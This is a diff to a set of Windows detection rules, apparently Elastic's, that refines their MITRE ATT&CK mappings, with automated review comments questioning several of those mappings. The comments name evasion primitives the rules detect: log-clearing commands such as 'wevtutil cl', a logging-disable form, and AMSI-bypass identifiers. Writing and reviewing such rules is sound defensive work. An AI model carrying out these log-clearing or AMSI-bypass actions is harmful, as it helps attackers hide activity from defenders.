@@ -79,18 +79,39 @@ event.category:file and host.os.type:windows and event.action:open and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable", "user.id"] diff --git a/rules/windows/credential_access_wireless_creds_dumping.toml b/rules/windows/credential_access_wireless_creds_dumping.toml index fb71341678b..7c94a74678b 100644 --- a/rules/windows/credential_access_wireless_creds_dumping.toml +++ b/rules/windows/credential_access_wireless_creds_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "system", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
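Review bot: With T1552.001 Credentials In Files now added, the retained T1003 OS Credential Dumping table on the same Credential Access block is contradictory: opening `web.config` (an `event.category:file ... event.action:open` new-terms rule, per the hunk header) reads application connection strings, not OS credential material, so T1003 should come out rather than sit beside the more precise mapping. T1005 Data from Local System under Collection is a fair addition; that new tactic needs `Tactic: Collection` in `rule.tags`, outside this hunk. Style: the `T1552` / `T1552.001` tables are inserted without the blank-line separators used for the new `[[rule.threat]]` block below them.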
@@ -123,31 +123,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/defense_evasion_amsi_bypass_powershell.toml b/rules/windows/defense_evasion_amsi_bypass_powershell.toml index f239ebb7b8f..61813c4a8b0 100644 --- a/rules/windows/defense_evasion_amsi_bypass_powershell.toml +++ b/rules/windows/defense_evasion_amsi_bypass_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
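Review bot: As with the web.config rule, after adding T1552.001 Credentials In Files the surviving T1003 OS Credential Dumping table no longer describes what a wireless-profile dump (inferred from the file name) does; the keys come from per-profile XML/DPAPI blobs, not from LSASS, SAM or NTDS. Recommend removing the T1003 table and keeping T1552.001 plus T1555. No tag change appears needed here since both tactics already existed on the rule, assuming `rule.tags` matched before this change.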
@@ -132,39 +132,49 @@ event.category:"process" and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_clearing_windows_event_logs.toml b/rules/windows/defense_evasion_clearing_windows_event_logs.toml index c2f04f5a873..50a42f7e78f 100644 --- a/rules/windows/defense_evasion_clearing_windows_event_logs.toml +++ b/rules/windows/defense_evasion_clearing_windows_event_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
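Review bot: T1027.010 Command Obfuscation is added to an AMSI-bypass rule whose `event.category:"process"` query is outside this hunk; if the pattern list matches bypass primitives such as `AmsiScanBuffer` or `amsiInitFailed` literally, those are not obfuscation, and the sub-technique only holds if the rule also matches encoded or split forms of them. Please confirm which it is and, if obfuscated variants are not in scope, keep the mapping at T1562.001 only.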
@@ -98,24 +98,28 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml index bbf8c289d02..aa828899622 100644 --- a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml +++ b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -237,10 +237,12 @@ Communication apps like Slack, WebEx, and Teams are integral to modern workflows [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" 
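Review bot: Nesting T1562.002 under its real parent T1562 fixes the structure, but it is worth asking whether Disable Windows Event Logging belongs on this rule at all: clearing a log with `wevtutil cl` / `Clear-EventLog` (the behaviour the file name and the `process where ... event.type == "start"` query suggest) is T1070.001 and does not stop future logging. Unless the command list also matches `wevtutil sl ... /e:false` or similar, dropping both T1562 tables leaves the rule with the single accurate mapping. The command list is outside the hunk, so treat this as a check rather than a blocker.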
@@ -251,27 +253,38 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_create_mod_root_certificate.toml b/rules/windows/defense_evasion_create_mod_root_certificate.toml index 3560277bb09..514692fc051 100644 --- a/rules/windows/defense_evasion_create_mod_root_certificate.toml +++ b/rules/windows/defense_evasion_create_mod_root_certificate.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
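Review bot: The new `[[rule.threat]]` block mapping this rule to tactic TA0002 "Execution" has no matching `Tactic: Execution` entry in the rule's `tags` list, which lives in the `[rule]` table outside this hunk and is not touched anywhere in the visible diff; this repository's rule files conventionally carry one `Tactic: <name>` tag per threat tactic, so the tag and threat sections now disagree unless the tag was already present. The same gap applies to every later hunk that introduces a new tactic block: defense_evasion_create_mod_root_certificate (Collection), defense_evasion_disable_nla and defense_evasion_enable_inbound_rdp_with_netsh (Lateral Movement), defense_evasion_execution_lolbas_wuauclt, defense_evasion_execution_msbuild_started_unusal_process, defense_evasion_indirect_exec_conhost and defense_evasion_masquerading_renamed_autoit (Execution), defense_evasion_lsass_ppl_disabled_registry (Credential Access) and defense_evasion_msbuild_making_network_connections (Command and Control). For each of these, add the corresponding `"Tactic: <tactic name>"` string to `tags` in the same commit, or confirm it is already there.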
@@ -154,19 +154,31 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" + [[rule.threat.technique.subtechnique]] id = "T1553.004" name = "Install Root Certificate" reference = "https://attack.mitre.org/techniques/T1553/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/defense_evasion_disable_nla.toml b/rules/windows/defense_evasion_disable_nla.toml index a3daa0e4c83..e808563bae7 100644 --- a/rules/windows/defense_evasion_disable_nla.toml +++ b/rules/windows/defense_evasion_disable_nla.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/25" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,7 @@ registry where host.os.type == "windows" and event.action != "deletion" and regi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" 
@@ -102,9 +103,30 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.010" +name = "Downgrade Attack" +reference = "https://attack.mitre.org/techniques/T1562/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml index e6b5d148708..8efcca4ce4a 100644 --- a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +++ b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -90,36 +90,76 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = 
"https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml b/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml index e9ad302d9ee..0ac8e7710fa 100644 --- a/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml +++ b/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,19 +91,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.004" name = "Disable or Modify System Firewall" reference = "https://attack.mitre.org/techniques/T1562/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml index 2cc57b1fcb1..23c029f86a1 100644 --- a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml 
+++ b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -138,14 +138,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml index 93810f62173..c5fd16c25f2 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -119,26 +119,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml index 078583b84ea..d9184a4ec77 100755 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -87,27 +87,40 @@ host.os.type:windows and event.category:process and event.type:start and ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -123,13 +136,15 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml index c2e91fd6574..08c29c23cbe 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,26 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml index ba363f8f52b..83083001b86 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -88,32 +88,49 @@ process.name:("csc.exe" or "iexplore.exe" or "powershell.exe") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml index e1eaae3f8de..4bc03f720d4 100644 --- a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml +++ b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/07" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Dennis Perto"] 
@@ -106,19 +106,33 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml index 628a39d0949..2adf52c0ccd 100644 --- a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml +++ b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -85,6 +85,17 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.013" +name = "Encrypted/Encoded File" +reference = "https://attack.mitre.org/techniques/T1027/013/" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -95,9 +106,7 @@ id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_iis_httplogging_disabled.toml b/rules/windows/defense_evasion_iis_httplogging_disabled.toml index 1f7de5422de..a8bf93c30d9 100644 --- a/rules/windows/defense_evasion_iis_httplogging_disabled.toml +++ b/rules/windows/defense_evasion_iis_httplogging_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,19 +89,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/windows/defense_evasion_indirect_exec_conhost.toml b/rules/windows/defense_evasion_indirect_exec_conhost.toml index 12330d28d1f..c429f557982 100644 --- a/rules/windows/defense_evasion_indirect_exec_conhost.toml +++ b/rules/windows/defense_evasion_indirect_exec_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,14 +80,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_indirect_exec_openssh.toml b/rules/windows/defense_evasion_indirect_exec_openssh.toml index 0e3563ddef1..886d3bde22c 100644 --- a/rules/windows/defense_evasion_indirect_exec_openssh.toml +++ b/rules/windows/defense_evasion_indirect_exec_openssh.toml 
